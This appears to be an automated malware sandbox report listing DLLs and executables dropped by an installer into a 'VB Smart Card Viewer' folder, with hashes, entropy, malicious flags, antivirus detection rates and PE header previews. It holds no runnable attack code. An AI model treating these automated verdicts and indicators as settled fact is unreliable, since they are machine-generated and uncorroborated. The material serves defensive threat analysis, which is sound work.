                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):555894
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4167624637949925
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
                                                                                                                                                                                                                                                                                                                                                                MD5:77A96C1C8E72D12BE4DFA5600A67E0F4
                                                                                                                                                                                                                                                                                                                                                                SHA1:F1A94189F7DA47DB26E332024C255AFAA085A654
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
                                                                                                                                                                                                                                                                                                                                                                SHA-512:267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2598926
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2658394092546565
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:i5AIqzwPbYgLHcIE0DtbfgQPKaGSR+J8QVPqFk8QCMJn:i5AIqMPbYgLastLzPzGSR+J8QVPq9Q
                                                                                                                                                                                                                                                                                                                                                                MD5:608FC55E2116CDCB88C3CF98B206017A
                                                                                                                                                                                                                                                                                                                                                                SHA1:D73E406A963D160D164D686EA25611E8771ADEBF
                                                                                                                                                                                                                                                                                                                                                                SHA-256:B39CF5A71B85B2CD233093EF7D55B39DB025DA78E080B38C070ACCF1436A2B4F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8098EDD9C1E399925EC0A07BCD277F8634E72D156A75F9A5AF25809B0AEEA8C592CD45772E756F5546E87868756A28476EC53756EC87D79B242E9F16C4DF983F
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........'........#...$......'...............................................(.......(...@... .......................&.......&..?...0'......................@'..............................I#.......................&..............................text...............................`.P`.data...<...........................@.`..rdata..x...........................@.`@/4............#.......#.............@.0@.bss....p.....&.......................`..edata........&.......&.............@.0@.idata...?....&..@....&.............@.0..CRT....,.....'.......&.............@.0..tls......... '.......&.............@.0..rsrc........0'.......&.............@.0..reloc.......@'.......&.............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1065100
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.300961775371533
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
                                                                                                                                                                                                                                                                                                                                                                MD5:B7DF9B43BF812DDAF60C99732C1AB273
                                                                                                                                                                                                                                                                                                                                                                SHA1:4A90353C8B2845008483854642B711E917F9CEEF
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):129038
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.508174898498455
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
                                                                                                                                                                                                                                                                                                                                                                MD5:3D8C24A40935FB27FC494FC6147E6EA8
                                                                                                                                                                                                                                                                                                                                                                SHA1:C26B6949C34AADB8271E124CE08F511BE5033A04
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-5KJV2.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):442
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8280681998470794
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
                                                                                                                                                                                                                                                                                                                                                                MD5:09204E71E9F3B624E909FB20DEFE6EF5
                                                                                                                                                                                                                                                                                                                                                                SHA1:2374900EBB8D9BB7127217DAE828A949B8E7938B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
                                                                                                                                                                                                                                                                                                                                                                SHA-512:7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-88Q2I.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3047424
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.876980432397359
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:/bxuBXjA7pOxwz1HCBCvWV3BE1G89lHdXCkdC7EVUgKcAWg5t:DxeYka7WVBEk89lHdXCkdQEdA
                                                                                                                                                                                                                                                                                                                                                                MD5:7BF352E43E5DDF72DCC1E5FE8C4061AC
                                                                                                                                                                                                                                                                                                                                                                SHA1:937E3E8DCD14ED6011F66A18D2FEBA67FB5AB505
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F9C5C91DE1DC52CED42C2FCAB95F9ACF560ECD56F392975BF1668A441CCB98E9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:01EE53E5E37BC4E8FFD7BED6300955174E0CD220F75379657CC4DBD1B54908E865D0468212B9B6A0B8834138E96EAFF00278C5955A492BC9CE6608E3E4C11BDA
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..>=.um=.um=.umR.~m<.um..{m).umR..mw.um=.tm6.um_.fm(.um..~m<.um..sm<.umRich=.um................PE..L....f.e.............................A............@..................................................................................0 ..i..............................................................................<............................text...:...........................`....rdata..\".......0..................@..@.data...XT.......@..................@....rsrc....p...0 ..p.... .............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):105784
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.258144336244945
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                                                                                                                                                                                                                MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                                                                                                                                                                                                                SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-C4TNB.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):720373
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.507181359300328
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjUR6FDExyFg:nu7eEYCP8trP837szHUA60SLtcV3E9fE
                                                                                                                                                                                                                                                                                                                                                                MD5:BBC68F2D9923F1E10C37703479C13301
                                                                                                                                                                                                                                                                                                                                                                SHA1:C017AF29745A24F7F74A535407C680A90B1AE5EC
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F62D22F6611EED484B8363209949370E93D07DB172556E8AB853470D691F202A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:B6F534CD0BB6A5DC4DAEB21BF9BC219A7200AA25CBDF87F183571744EE24B4D2AE74911E7996B646934E99BF263C7459BAF8937B1E179441995D59B8B7D96189
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):127192
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.479927027421408
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
                                                                                                                                                                                                                                                                                                                                                                MD5:8B2A6E8419A8A4E7D3FD023D97455FB9
                                                                                                                                                                                                                                                                                                                                                                SHA1:2547A1F94FB4F83B7C133A3E285EE11FAA155E84
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
                                                                                                                                                                                                                                                                                                                                                                SHA-512:44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1007104
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.652666405660804
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
                                                                                                                                                                                                                                                                                                                                                                MD5:AE58662A16410481B477B78B8D47460B
                                                                                                                                                                                                                                                                                                                                                                SHA1:FB8B1BA166913C18EB00F8CA53439D0F4EE54359
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):40974
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.485702128133584
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                                                                                                                                                                                                                MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                                                                                                                                                                                                                SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                                                                                                                                                                                                                SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):698382
